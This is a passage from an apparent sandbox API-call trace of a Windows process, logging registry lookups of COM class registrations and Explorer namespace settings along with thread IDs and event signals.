pdwType=0x55ac700*=0x1, pvData=0x0, pcbData=0x55ac758*=0x22) returned 0x0 [0248.494] RegGetValueW (in: hkey=0x139e, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55ac700, pvData=0x5d80050, pcbData=0x55ac758*=0x22 | out: pdwType=0x55ac700*=0x1, pvData="PSFactoryBuffer", pcbData=0x55ac758*=0x20) returned 0x0 [0248.494] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0248.494] RegGetValueW (in: hkey=0x159a, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x55ac650, pvData=0x0, pcbData=0x55ac6a8*=0x0 | out: pdwType=0x55ac650*=0x0, pvData=0x0, pcbData=0x55ac6a8*=0x0) returned 0x2 [0248.495] RegGetValueW (in: hkey=0x159a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55ac690, pvData=0x0, pcbData=0x55ac6e8*=0x0 | out: pdwType=0x55ac690*=0x1, pvData=0x0, pcbData=0x55ac6e8*=0x44) returned 0x0 [0248.495] RegGetValueW (in: hkey=0x159a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55ac690, pvData=0xd1be560, pcbData=0x55ac6e8*=0x44 | out: pdwType=0x55ac690*=0x1, pvData="C:\\Windows\\System32\\ActXPrxy.dll", pcbData=0x55ac6e8*=0x42) returned 0x0 [0248.495] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0248.495] RegGetValueW (in: hkey=0x159a, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x55ac640, pvData=0x55ac660, pcbData=0x55ac628*=0x3c | out: pdwType=0x55ac640*=0x1, pvData="Both", pcbData=0x55ac628*=0xa) returned 0x0 [0248.495] RegGetValueW (in: hkey=0x139e, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x55ac6b0, pvData=0x0, pcbData=0x55ac708*=0x0 | out: pdwType=0x55ac6b0*=0x0, pvData=0x0, pcbData=0x55ac708*=0x0) returned 0x2 [0248.495] RegGetValueW (in: hkey=0x139e, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x55ac6b0, pvData=0x0, pcbData=0x55ac708*=0x0 | out: pdwType=0x55ac6b0*=0x0, pvData=0x0, pcbData=0x55ac708*=0x0) returned 0x2 [0252.671] SetEvent (hEvent=0xa0c) returned 1 [0252.671] SetEvent (hEvent=0x930) returned 1 [0262.774] SetEvent (hEvent=0x12c4) returned 1 [0262.917] SetEvent (hEvent=0x12c4) returned 1 [0262.917] SetEvent (hEvent=0x182c) returned 1 [0271.749] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.749] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x55ae920, pvData=0x55ae928, pcbData=0x55ae924*=0x4 | out: pdwType=0x55ae920*=0x0, pvData=0x55ae928, pcbData=0x55ae924*=0x4) returned 0x2 [0271.749] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.749] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x55ae920, pvData=0x55ae928, pcbData=0x55ae924*=0x4 | out: pdwType=0x55ae920*=0x4, pvData=0x55ae928*=0x1, pcbData=0x55ae924*=0x4) returned 0x0 [0271.851] RegGetValueW (in: hkey=0x10d6, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x55ae110, pcbData=0x55ae058*=0xc8 | out: pdwType=0x0, pvData=0x55ae110, pcbData=0x55ae058*=0xc8) returned 0x2 [0271.851] RegGetValueW (in: hkey=0x10d6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55adf60, pvData=0x0, pcbData=0x55adfb8*=0x0 | out: pdwType=0x55adf60*=0x1, pvData=0x0, pcbData=0x55adfb8*=0x34) returned 0x0 [0271.851] RegGetValueW (in: hkey=0x10d6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55adf60, pvData=0xd37d130, pcbData=0x55adfb8*=0x34 | out: pdwType=0x55adf60*=0x1, pvData="Home Group Member Status", pcbData=0x55adfb8*=0x32) returned 0x0 [0271.851] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0271.852] RegGetValueW (in: hkey=0xc1a, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x55adeb0, pvData=0x0, pcbData=0x55adf08*=0x0 | out: pdwType=0x55adeb0*=0x0, pvData=0x0, pcbData=0x55adf08*=0x0) returned 0x2 [0271.852] RegGetValueW (in: hkey=0xc1a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55adef0, pvData=0x0, pcbData=0x55adf48*=0x0 | out: pdwType=0x55adef0*=0x1, pvData=0x0, pcbData=0x55adf48*=0x44) returned 0x0 [0271.852] RegGetValueW (in: hkey=0xc1a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x55adef0, pvData=0xd393210, pcbData=0x55adf48*=0x44 | out: pdwType=0x55adef0*=0x1, pvData="C:\\Windows\\System32\\provsvc.dll", pcbData=0x55adf48*=0x44) returned 0x0 [0271.852] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0271.852] RegGetValueW (in: hkey=0xc1a, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x55adea0, pvData=0x55adec0, pcbData=0x55ade88*=0x3c | out: pdwType=0x55adea0*=0x1, pvData="Both", pcbData=0x55ade88*=0xa) returned 0x0 [0271.852] RegGetValueW (in: hkey=0x10d6, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x55adf10, pvData=0x0, pcbData=0x55adf68*=0x0 | out: pdwType=0x55adf10*=0x0, pvData=0x0, pcbData=0x55adf68*=0x0) returned 0x2 [0271.852] RegGetValueW (in: hkey=0x10d6, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x55adf10, pvData=0x0, pcbData=0x55adf68*=0x0 | out: pdwType=0x55adf10*=0x0, pvData=0x0, pcbData=0x55adf68*=0x0) returned 0x2 [0271.866] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.866] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x55acdf0, pvData=0x55acdf8, pcbData=0x55acdf4*=0x4 | out: pdwType=0x55acdf0*=0x0, pvData=0x55acdf8, pcbData=0x55acdf4*=0x4) returned 0x2 [0271.866] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.866] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x55acdf0, pvData=0x55acdf8, pcbData=0x55acdf4*=0x4 | out: pdwType=0x55acdf0*=0x0, pvData=0x55acdf8, pcbData=0x55acdf4*=0x4) returned 0x2 Thread: id = 78 os_tid = 0x8ac Thread: id = 79 os_tid = 0x8a8 Thread: id = 80 os_tid = 0x8a0 Thread: id = 81 os_tid = 0x89c Thread: id = 82 os_tid = 0x898 Thread: id = 83 os_tid = 0x894 Thread: id = 84 os_tid = 0x890 Thread: id = 85 os_tid = 0x88c Thread: id = 86 os_tid = 0x884 [0271.117] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.117] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x3a8e830, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4 | out: pdwType=0x3a8e830*=0x0, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4) returned 0x2 [0271.117] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.117] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x3a8e830, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4 | out: pdwType=0x3a8e830*=0x0, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4) returned 0x2 [0271.118] StrCmpIW (psz1="{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} {000214E6-0000-0000-C000-000000000046} 0xFFFF", psz2="DelegateExecute") returned -1 [0271.118] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Cached", lpValue="{9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} {000214E6-0000-0000-C000-000000000046} 0xFFFF", dwFlags=0x8, pdwType=0x0, pvData=0x3a8ce98, pcbData=0x3a8ce20*=0x10 | out: pdwType=0x0, pvData=0x3a8ce98, pcbData=0x3a8ce20*=0x10) returned 0x0 [0271.118] StrCmpIW (psz1="HasFlushedShellExtCache", psz2="DelegateExecute") returned 1 [0271.118] RegGetValueW (in: hkey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions", lpValue="HasFlushedShellExtCache", dwFlags=0x10, pdwType=0x0, pvData=0x3a8ce98, pcbData=0x3a8cee8*=0x4 | out: pdwType=0x0, pvData=0x3a8ce98, pcbData=0x3a8cee8*=0x4) returned 0x0 [0271.118] RegGetValueW (in: hkey=0x8e2, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x3a8ce60, pcbData=0x3a8cda8*=0xc8 | out: pdwType=0x0, pvData=0x3a8ce60, pcbData=0x3a8cda8*=0xc8) returned 0x2 [0271.119] RegGetValueW (in: hkey=0x8e2, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x3a8ccb0, pvData=0x0, pcbData=0x3a8cd08*=0x0 | out: pdwType=0x3a8ccb0*=0x1, pvData=0x0, pcbData=0x3a8cd08*=0x28) returned 0x0 [0271.119] RegGetValueW (in: hkey=0x8e2, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x3a8ccb0, pvData=0xd34a1d0, pcbData=0x3a8cd08*=0x28 | out: pdwType=0x3a8ccb0*=0x1, pvData="Sync Center Folder", pcbData=0x3a8cd08*=0x26) returned 0x0 [0271.119] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0271.119] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x3a8cc00, pvData=0x0, pcbData=0x3a8cc58*=0x0 | out: pdwType=0x3a8cc00*=0x0, pvData=0x0, pcbData=0x3a8cc58*=0x0) returned 0x2 [0271.119] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x3a8cc40, pvData=0x0, pcbData=0x3a8cc98*=0x0 | out: pdwType=0x3a8cc40*=0x1, pvData=0x0, pcbData=0x3a8cc98*=0x4a) returned 0x0 [0271.119] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x3a8cc40, pvData=0x442f7b0, pcbData=0x3a8cc98*=0x4a | out: pdwType=0x3a8cc40*=0x1, pvData="C:\\Windows\\System32\\SyncCenter.dll", pcbData=0x3a8cc98*=0x4a) returned 0x0 [0271.119] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0271.119] RegGetValueW (in: hkey=0x902, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x3a8cbf0, pvData=0x3a8cc10, pcbData=0x3a8cbd8*=0x3c | out: pdwType=0x3a8cbf0*=0x1, pvData="Apartment", pcbData=0x3a8cbd8*=0x14) returned 0x0 [0271.119] RegGetValueW (in: hkey=0x8e2, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x3a8cc60, pvData=0x0, pcbData=0x3a8ccb8*=0x0 | out: pdwType=0x3a8cc60*=0x0, pvData=0x0, pcbData=0x3a8ccb8*=0x0) returned 0x2 [0271.119] RegGetValueW (in: hkey=0x8e2, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x3a8cc60, pvData=0x0, pcbData=0x3a8ccb8*=0x0 | out: pdwType=0x3a8cc60*=0x0, pvData=0x0, pcbData=0x3a8ccb8*=0x0) returned 0x2 [0271.120] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.120] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x3a8e410, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4 | out: pdwType=0x3a8e410*=0x0, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4) returned 0x2 [0271.120] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.120] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x3a8e410, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4 | out: pdwType=0x3a8e410*=0x0, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4) returned 0x2 [0271.121] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.121] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x3a8e830, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4 | out: pdwType=0x3a8e830*=0x0, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4) returned 0x2 [0271.121] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.121] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x3a8e830, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4 | out: pdwType=0x3a8e830*=0x0, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4) returned 0x2 [0271.122] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.122] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x3a8e410, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4 | out: pdwType=0x3a8e410*=0x0, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4) returned 0x2 [0271.122] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.122] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x3a8e410, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4 | out: pdwType=0x3a8e410*=0x0, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4) returned 0x2 [0271.122] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.122] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x3a8e830, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4 | out: pdwType=0x3a8e830*=0x0, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4) returned 0x2 [0271.123] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.123] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x3a8e830, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4 | out: pdwType=0x3a8e830*=0x0, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4) returned 0x2 [0271.123] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.123] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x3a8e410, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4 | out: pdwType=0x3a8e410*=0x0, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4) returned 0x2 [0271.123] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.123] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x3a8e410, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4 | out: pdwType=0x3a8e410*=0x0, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4) returned 0x2 [0271.127] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.127] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x3a8e830, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4 | out: pdwType=0x3a8e830*=0x0, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4) returned 0x2 [0271.127] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.127] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x3a8e830, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4 | out: pdwType=0x3a8e830*=0x0, pvData=0x3a8e838, pcbData=0x3a8e834*=0x4) returned 0x2 [0271.128] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.128] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x3a8e410, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4 | out: pdwType=0x3a8e410*=0x0, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4) returned 0x2 [0271.128] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.128] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x3a8e410, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4 | out: pdwType=0x3a8e410*=0x0, pvData=0x3a8e418, pcbData=0x3a8e414*=0x4) returned 0x2 Thread: id = 87 os_tid = 0x880 [0218.157] StrCmpIW (psz1="ActivationType", psz2="DelegateExecute") returned -1 [0218.157] RegGetValueW (in: hkey=0xd10, lpSubKey=0x0, lpValue="ActivationType", dwFlags=0x10, pdwType=0x0, pvData=0x387e748, pcbData=0x387e560*=0x4 | out: pdwType=0x0, pvData=0x387e748, pcbData=0x387e560*=0x4) returned 0x0 [0218.157] StrCmpIW (psz1="Threading", psz2="DelegateExecute") returned 1 [0218.157] RegGetValueW (in: hkey=0xd10, lpSubKey=0x0, lpValue="Threading", dwFlags=0x10, pdwType=0x0, pvData=0x387e77c, pcbData=0x387e560*=0x4 | out: pdwType=0x0, pvData=0x387e77c, pcbData=0x387e560*=0x4) returned 0x2 [0218.157] StrCmpIW (psz1="TrustLevel", psz2="DelegateExecute") returned 1 [0218.157] RegGetValueW (in: hkey=0xd10, lpSubKey=0x0, lpValue="TrustLevel", dwFlags=0x10, pdwType=0x0, pvData=0x387e784, pcbData=0x387e560*=0x4 | out: pdwType=0x0, pvData=0x387e784, pcbData=0x387e560*=0x4) returned 0x0 [0218.157] StrCmpIW (psz1="ActivateAsUser", psz2="DelegateExecute") returned -1 [0218.157] RegGetValueW (in: hkey=0xd10, lpSubKey=0x0, lpValue="ActivateAsUser", dwFlags=0x10, pdwType=0x0, pvData=0x387e7a4, pcbData=0x387e560*=0x4 | out: pdwType=0x0, pvData=0x387e7a4, pcbData=0x387e560*=0x4) returned 0x2 [0218.157] StrCmpIW (psz1="IdentityType", psz2="DelegateExecute") returned 1 [0218.157] RegGetValueW (in: hkey=0x4ac, lpSubKey=0x0, lpValue="IdentityType", dwFlags=0x10, pdwType=0x0, pvData=0x387e348, pcbData=0x387e050*=0x4 | out: pdwType=0x0, pvData=0x387e348, pcbData=0x387e050*=0x4) returned 0x0 [0218.157] StrCmpIW (psz1="Permissions", psz2="DelegateExecute") returned 1 [0218.157] RegGetValueW (in: hkey=0x4ac, lpSubKey=0x0, lpValue="Permissions", dwFlags=0x8, pdwType=0x0, pvData=0x387dfc0, pcbData=0x387dfb0*=0x80 | out: pdwType=0x0, pvData=0x387dfc0, pcbData=0x387dfb0*=0x80) returned 0x0 [0218.157] StrCmpIW (psz1="ServerType", psz2="DelegateExecute") returned 1 [0218.157] RegGetValueW (in: hkey=0x4ac, lpSubKey=0x0, lpValue="ServerType", dwFlags=0x10, pdwType=0x0, pvData=0x387e378, pcbData=0x387e050*=0x4 | out: pdwType=0x0, pvData=0x387e378, pcbData=0x387e050*=0x4) returned 0x0 [0218.160] RegGetValueW (in: hkey=0x4ae, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x387d2c0, pcbData=0x387d208*=0xc8 | out: pdwType=0x0, pvData=0x387d2c0, pcbData=0x387d208*=0xc8) returned 0x2 [0218.160] RegGetValueW (in: hkey=0x4ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x387d110, pvData=0x0, pcbData=0x387d168*=0x0 | out: pdwType=0x387d110*=0x1, pvData=0x0, pcbData=0x387d168*=0x22) returned 0x0 [0218.160] RegGetValueW (in: hkey=0x4ae, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x387d110, pvData=0x4439c10, pcbData=0x387d168*=0x22 | out: pdwType=0x387d110*=0x1, pvData="PSFactoryBuffer", pcbData=0x387d168*=0x20) returned 0x0 [0218.160] StrCmpIW (psz1="InprocServer32", psz2="DelegateExecute") returned 1 [0218.161] RegGetValueW (in: hkey=0xc0a, lpSubKey=0x0, lpValue="InprocServer32", dwFlags=0x23, pdwType=0x387d060, pvData=0x0, pcbData=0x387d0b8*=0x0 | out: pdwType=0x387d060*=0x0, pvData=0x0, pcbData=0x387d0b8*=0x0) returned 0x2 [0218.161] RegGetValueW (in: hkey=0xc0a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x387d0a0, pvData=0x0, pcbData=0x387d0f8*=0x0 | out: pdwType=0x387d0a0*=0x1, pvData=0x0, pcbData=0x387d0f8*=0x64) returned 0x0 [0218.161] RegGetValueW (in: hkey=0xc0a, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x387d0a0, pvData=0x5d9e470, pcbData=0x387d0f8*=0x64 | out: pdwType=0x387d0a0*=0x1, pvData="C:\\Windows\\System32\\\\Windows.StateRepository.dll", pcbData=0x387d0f8*=0x62) returned 0x0 [0218.161] StrCmpIW (psz1="ThreadingModel", psz2="DelegateExecute") returned 1 [0218.161] RegGetValueW (in: hkey=0xc0a, lpSubKey=0x0, lpValue="ThreadingModel", dwFlags=0x20000003, pdwType=0x387d050, pvData=0x387d070, pcbData=0x387d038*=0x3c | out: pdwType=0x387d050*=0x1, pvData="Both", pcbData=0x387d038*=0xa) returned 0x0 [0218.161] RegGetValueW (in: hkey=0x4ae, lpSubKey="InprocHandler32", lpValue=0x0, dwFlags=0x23, pdwType=0x387d0c0, pvData=0x0, pcbData=0x387d118*=0x0 | out: pdwType=0x387d0c0*=0x0, pvData=0x0, pcbData=0x387d118*=0x0) returned 0x2 [0218.161] RegGetValueW (in: hkey=0x4ae, lpSubKey="InprocHandler", lpValue=0x0, dwFlags=0x23, pdwType=0x387d0c0, pvData=0x0, pcbData=0x387d118*=0x0 | out: pdwType=0x387d0c0*=0x0, pvData=0x0, pcbData=0x387d118*=0x0) returned 0x2 [0218.162] StrCmpIW (psz1="ActivationType", psz2="DelegateExecute") returned -1 [0218.162] RegGetValueW (in: hkey=0xc08, lpSubKey=0x0, lpValue="ActivationType", dwFlags=0x10, pdwType=0x0, pvData=0x387e748, pcbData=0x387e560*=0x4 | out: pdwType=0x0, pvData=0x387e748, pcbData=0x387e560*=0x4) returned 0x0 [0218.162] StrCmpIW (psz1="Threading", psz2="DelegateExecute") returned 1 [0218.162] RegGetValueW (in: hkey=0xc08, lpSubKey=0x0, lpValue="Threading", dwFlags=0x10, pdwType=0x0, pvData=0x387e77c, pcbData=0x387e560*=0x4 | out: pdwType=0x0, pvData=0x387e77c, pcbData=0x387e560*=0x4) returned 0x2 [0218.162] StrCmpIW (psz1="TrustLevel", psz2="DelegateExecute") returned 1 [0218.162] RegGetValueW (in: hkey=0xc08, lpSubKey=0x0, lpValue="TrustLevel", dwFlags=0x10, pdwType=0x0, pvData=0x387e784, pcbData=0x387e560*=0x4 | out: pdwType=0x0, pvData=0x387e784, pcbData=0x387e560*=0x4) returned 0x0 [0218.162] StrCmpIW (psz1="ActivateAsUser", psz2="DelegateExecute") returned -1 [0218.162] RegGetValueW (in: hkey=0xc08, lpSubKey=0x0, lpValue="ActivateAsUser", dwFlags=0x10, pdwType=0x0, pvData=0x387e7a4, pcbData=0x387e560*=0x4 | out: pdwType=0x0, pvData=0x387e7a4, pcbData=0x387e560*=0x4) returned 0x2 Thread: id = 88 os_tid = 0x860 Thread: id = 89 os_tid = 0x85c Thread: id = 90 os_tid = 0x850 Thread: id = 91 os_tid = 0x84c Thread: id = 92 os_tid = 0x848 [0271.785] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.785] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x20cf080, pvData=0x20cf088, pcbData=0x20cf084*=0x4 | out: pdwType=0x20cf080*=0x0, pvData=0x20cf088, pcbData=0x20cf084*=0x4) returned 0x2 [0271.785] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.785] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x20cf080, pvData=0x20cf088, pcbData=0x20cf084*=0x4 | out: pdwType=0x20cf080*=0x4, pvData=0x20cf088*=0x1, pcbData=0x20cf084*=0x4) returned 0x0 [0271.785] StrCmpIW (psz1="ValidateRegItems", psz2="DelegateExecute") returned 1 [0271.785] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="ValidateRegItems", dwFlags=0x10000012, pdwType=0x20cd560, pvData=0x20cd568, pcbData=0x20cd564*=0x4 | out: pdwType=0x20cd560*=0x0, pvData=0x20cd568, pcbData=0x20cd564*=0x4) returned 0x2 [0271.786] StrCmpIW (psz1="MonitorRegistry", psz2="DelegateExecute") returned 1 [0271.786] RegGetValueW (in: hkey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MyComputer\\NameSpace", lpValue="MonitorRegistry", dwFlags=0x10000012, pdwType=0x20cd560, pvData=0x20cd568, pcbData=0x20cd564*=0x4 | out: pdwType=0x20cd560*=0x0, pvData=0x20cd568, pcbData=0x20cd564*=0x4) returned 0x2 [0272.400] RegGetValueW (in: hkey=0xdd6, lpSubKey="TreatAs", lpValue=0x0, dwFlags=0xffff, pdwType=0x0, pvData=0x20ce490, pcbData=0x20ce3d8*=0xc8 | out: pdwType=0x0, pvData=0x20ce490, pcbData=0x20ce3d8*=0xc8) returned 0x2 [0272.400] RegGetValueW (in: hkey=0xdd6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, pdwType=0x20ce2e0, pvData=0x0, pcbData=0x20ce338*=0x0 | out: pdwType=0x20ce2e0*=0x1, pvData=0x0, pcbData=0x20ce338*=0x6c) returned 0x0 [0272.400] RegGetValueW (in: hkey=0xdd6, lpSubKey=0x0, lpValue=0x0, dwFlags=0x23, 